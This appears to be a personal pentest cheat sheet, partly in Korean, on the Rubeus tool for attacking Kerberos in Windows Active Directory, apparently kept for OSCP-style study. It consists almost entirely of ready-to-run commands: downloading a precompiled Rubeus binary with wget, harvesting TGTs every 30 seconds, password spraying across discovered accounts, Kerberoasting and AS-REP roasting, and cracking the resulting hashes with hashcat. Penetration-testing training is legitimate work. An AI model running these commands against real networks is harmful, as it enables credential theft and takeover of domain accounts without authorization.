NOT ALLOWED IN OSCP # Installation Kali에서 준비해서 윈도우로 옮기기 ```bash wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe -O rubeus.exe ``` # Harvesting Tickets ```powershell # 30초마다 TGT harvest Rubeus.exe harvest /interval:30 ``` # Password Spraying - 발견된 모든 사용자 계정에 대해 패스워드 spray 실시 - 패스워드가 일치하는 계정이 있다면 - 해당 계정으로 TGT (또는 TGS) 요청 - `.kirbi` 형식의 티켓을 저장 ```powershell Rubeus.exe brute /password:<password> /noticket ``` # Kerberoasting ```powershell rubeus.exe kerberoast /nowrap hashcat -m 13100 -a 0 <hash> <wordlist> ``` # AS-REP Roasting ```powershell rubeus.exe asreproast /nowrap # Insert 23$ after $krb5asrep$ hashcat -m 18200 -a 0 <hash> <wordlist> ```